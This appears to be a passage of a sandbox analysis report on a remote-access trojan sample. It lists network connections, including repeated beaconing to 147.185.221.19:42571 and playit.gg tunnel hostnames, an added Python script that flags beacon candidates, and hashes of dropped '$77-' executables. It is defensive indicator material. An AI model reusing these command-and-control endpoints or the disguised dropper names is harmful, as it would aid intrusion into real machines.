US 8.8.8.8:53 175.25.90.104.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 93.61.165.172.in-addr.arpa udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 40.126.32.138:443 login.microsoftonline.com tcp
US 8.8.8.8:53 64.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 services.bingapis.com udp
US 8.8.8.8:53 services.bingapis.com udp
US 13.107.5.80:443 services.bingapis.com tcp
US 8.8.8.8:53 80.5.107.13.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
GB 216.58.204.67:443 update.googleapis.com tcp
US 13.107.246.64:443 edge-mobile-static.azureedge.net tcp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 214.143.182.52.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
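
In the Network table the only destination contacted repeatedly on a non-web port is 147.185.221.19:42571, and no row associates a hostname with it; the DNS queries for politics-fiber.gl.at.ply.gg and teen-modes.gl.at.ply.gg that sit between those connections are playit.gg tunnel hostnames, the kind of legitimate relay service the summary's "Legitimate hosting services abused for malware hosting/C2" signature refers to, alongside the discord.com download. The Python below is an added example, not part of the report: it parses rows in the format of the table above, picks out destinations that look like a beacon (repeated TCP connections to a non-web port with no resolved name) and lists hostnames under known tunnelling services. The rows are a representative subset copied from the table; the tunnel-domain suffix list is an illustrative assumption.

```python
import re
from collections import Counter

# Added example, not part of the report: triage rows of the Network table.
# Columns are Country, Destination (ip:port), Domain (may be empty), Proto.
ROW = re.compile(r"^([A-Z]{2})\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+(?:(\S+)\s+)?(tcp|udp)$")

# A subset of rows copied from the table above.
SAMPLE_TABLE = """
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 penisware.com udp
US 104.21.17.92:443 penisware.com tcp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 politics-fiber.gl.at.ply.gg udp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 teen-modes.gl.at.ply.gg udp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
NL 23.62.61.97:443 www.bing.com tcp
US 147.185.221.19:42571 tcp
"""

# Suffixes of hostnames handed out by public tunnelling services (assumed,
# illustrative list; extend it from your own intel).
TUNNEL_SUFFIXES = (".ply.gg", ".ngrok.io", ".ngrok-free.app", ".trycloudflare.com")


def parse_rows(text: str) -> list:
    """Turn table rows into dicts; lines that do not match the layout are skipped."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        country, ip, port, domain, proto = m.groups()
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def resolved_names(rows: list) -> dict:
    """Hostnames the table associates with each destination IP (DNS rows give none)."""
    names = {}
    for r in rows:
        if r["domain"] and r["port"] != 53 and not r["domain"].endswith(".in-addr.arpa"):
            names.setdefault(r["ip"], set()).add(r["domain"])
    return names


def beacon_candidates(rows: list, min_connections: int = 5, web_ports=(80, 443)) -> list:
    """Destinations hit repeatedly over TCP on a non-web port with no hostname."""
    names = resolved_names(rows)
    counts = Counter((r["ip"], r["port"]) for r in rows if r["proto"] == "tcp")
    out = []
    for (ip, port), n in counts.most_common():
        if port in web_ports or ip in names or n < min_connections:
            continue
        out.append({"ip": ip, "port": port, "connections": n})
    return out


def tunnel_hostnames(rows: list) -> list:
    """Queried or contacted hostnames that belong to a tunnelling service."""
    return sorted({r["domain"] for r in rows
                   if r["domain"] and r["domain"].endswith(TUNNEL_SUFFIXES)})


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_TABLE)
    print("beacon candidates:", beacon_candidates(rows))
    print("tunnel hostnames:", tunnel_hostnames(rows))
```

The counting is deliberately simple: a sandbox table has no timestamps, so there is no interval to measure, and the "no resolved name" test is what separates the RAT's socket from the browser and telemetry traffic that fills the rest of the table.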

Files

C:\Windows\Resources\$77-sdchost.exe

MD5 3f7291a1225138608a020a1e3ccc4740
SHA1 77bc47fd739a3efb3f22b590b6acb4e101d78c61
SHA256 b07657bb984766acf4f99a7645f6da9a251e2dc3afc839a6ae7f049605b87011
SHA512 03c622b528930e70d103a7ccfe8405cea333e5801a8bded99555bb58819b67ee5dcdb0861a3bc17afd5903b392f0a7a766047dbccd1674203c61238cd65f39e7

C:\Windows\Resources\$77-scchost.exe

MD5 9c17bdda52e21d8df835cee315b506dd
SHA1 f01ccf02c4b92dc8e261da1e48f54ccd548c8af0
SHA256 f8bcd12f0b30a378747069cc28aaae74d30aafc33656152ee34f818a10e8973f
SHA512 7acd79e169949ef7445230ea474a38786cda317469be340fa94b83dcf26b0025b0baff45ff37c88c632ceaef6565a503d7f19d3884c467f8d68c28f86c3f9889

memory/4020-11-0x00000000002D0000-0x000000000035E000-memory.dmp

memory/4268-12-0x0000000000CB0000-0x0000000000D36000-memory.dmp

C:\Windows\Resources\$77-penisware.exe

MD5 d2b0fd7476f280dc1d8d085d693b37f8
SHA1 6d8cd2158d77f33b7c320984cedbbf3ac7c8513c
SHA256 c05c71085a3ff83980a530aa77c500b98610f4e934315b6831448b96a45d9067
SHA512 d3fd2bfe426b9c9a1c83e3b03fd0f6c32e07c236116f4319305adbe8e323be506cc92a390e7d86e0355618df995474455c26f8de24831283902e90c38853bf41

memory/1212-16-0x00000000008B0000-0x0000000000926000-memory.dmp

C:\Windows\Resources\$77-penisware2.exe

MD5 18f497deffe88b6b2cff336a277aface
SHA1 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA256 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA512 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

memory/2492-20-0x00000000008A0000-0x00000000008E6000-memory.dmp

memory/2492-21-0x0000000000F80000-0x0000000000F86000-memory.dmp

C:\Windows\Resources\$77-install.exe

MD5 1a7d1b5d24ba30c4d3d5502295ab5e89
SHA1 2d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256 b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

C:\Users\Admin\AppData\Local\Temp\tmp829.tmp.bat

MD5 f9968ce2fc9f76c50aab6dd2c3946135
SHA1 8ad6731b10344ce061c20da7cc804db708518955
SHA256 4c61e1af995654525db973afdecb946a581d207ab3362239ab1bf453ab1c2e49
SHA512 32edad9cbec8fb20898f7580e7dadb05ddc97853b38e076843cad89199e3b0fbd58f2787c8d6a1817938d61feb78012474314b3dfd05c4633b6448a1002277d0

memory/4856-33-0x0000023A3DC70000-0x0000023A3DC92000-memory.dmp

C:\Windows\Temp\__PSScriptPolicyTest_4f0veh3h.5ea.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4856-41-0x0000023A40200000-0x0000023A4022A000-memory.dmp

memory/4856-43-0x00007FFFC9050000-0x00007FFFC910E000-memory.dmp

memory/4856-42-0x00007FFFCAA90000-0x00007FFFCAC85000-memory.dmp

memory/220-47-0x0000000140000000-0x0000000140008000-memory.dmp

memory/220-46-0x0000000140000000-0x0000000140008000-memory.dmp

memory/220-45-0x0000000140000000-0x0000000140008000-memory.dmp

memory/220-44-0x0000000140000000-0x0000000140008000-memory.dmp

memory/220-51-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3548-57-0x000002563A4B0000-0x000002563A4DB000-memory.dmp

memory/3548-56-0x000002563A480000-0x000002563A4A5000-memory.dmp

memory/3548-58-0x000002563A4B0000-0x000002563A4DB000-memory.dmp

memory/3548-64-0x000002563A4B0000-0x000002563A4DB000-memory.dmp

memory/3548-65-0x00007FFF8AB10000-0x00007FFF8AB20000-memory.dmp

memory/4268-69-0x0000000001650000-0x000000000167B000-memory.dmp

memory/1212-78-0x0000000001170000-0x000000000119B000-memory.dmp

memory/2492-88-0x000000001B970000-0x000000001B99B000-memory.dmp

memory/1960-96-0x0000025A13FE0000-0x0000025A1400B000-memory.dmp

memory/1960-103-0x00007FFF8AB10000-0x00007FFF8AB20000-memory.dmp

memory/972-107-0x000001E1404C0000-0x000001E1404EB000-memory.dmp

memory/1960-102-0x0000025A13FE0000-0x0000025A1400B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.log

MD5 183dd1cd0014293865e135951d0197ab
SHA1 268bba2c9c82727b1b32857e67ec26af46ad4cc6
SHA256 2f46685bdaf0f2e29ea07f3967a99785e9eab1add962f357acfc68b53545057e
SHA512 c6fb59e54c4934bd4018ac404a7cd4d5ab6f1687b8e73c9a54d16f0158381f0d8c41160cd8f7f11ecff0da84f3b278beb5a224c7423a8623be617cf7ec63b271

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6c010b02317bdddd23944282642ec796
SHA1 05504f29b249e87c1ad8276e7e0bd9f9eaf48c04
SHA256 f53f48a6a05f697d5d8b64d78dbacfca1b379bff9938e8fe9015c6d5546d06b1
SHA512 4fc92332bd41ecde2e54fcb08992902f220c172f52aca2842ba03a8c857b770c4cad78a73f2fbc1013506c9c2d56fc459e7ea92ea1622b617947a5b29c32b53d

\??\pipe\crashpad_5424_ASYXDVEZSJUHSFQR

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ab342cec039c39b41deec188abd85e5b
SHA1 e7a817c0650cb7d0c9e654b35a381f552c1cff72
SHA256 638df312904e77ead9fc391231bbb43f3f594d29a8f80b39b1248f7ec0a0fba0
SHA512 1c4769993df16750978d85321dc7b2b3c916b736b6b32797d1b764a9072271a1311e5c0d815b14bbabb3bce36e30c5208836635f77add16a34358e0afd9c09eb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8b2c2e04a2298d528e8097a085cfdd05
SHA1 5f383d37f02ee89276724c13e8d50d12232bd40d
SHA256 c0b018c7ae80444cf0b3cce47182157f64794b874ad25539292ecce3c0415f4f
SHA512 b52892eb9502184b35006cc8529297e73c1fa099bbafaf1e326b58038702af7f8a6071062d16cf8b85241803a98f8d278a12ee62bae44f86910c33787b9bda13

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 f8c0cc0a68ed22dee319ebbb70bce669
SHA1 91bc00d932b728935a8b1da95317be39eb2ff32a
SHA256 1d1b26a8b03ec00778f11cb135a38b1dc7858dee5b0c7c840398a6e10fae5243
SHA512 d5af75636561fc0574e820287e62b290fde34500056e63da48e54cb04e94b07e0761cfe8eee6b82f7e9285a1ab378314af7c613a72434351646b5a1cd8eb1884

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-penisware.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 d9c7d39c7bffea1b1e7f406744c72257
SHA1 6faea4bc43874655ea6b9eb0b2773c2c1684d7dd
SHA256 352c6424794af58a9c30403b3c725c280c2e03a87e58923e888a189aa4c568ce
SHA512 834ad46b08bcbfb0625a5c5b12c126e141946458b7280859c60e3c76c8aee7260b8137c30db6e9c7e78340e8c06d01788531acaf710368e59d06a48ef6f0750d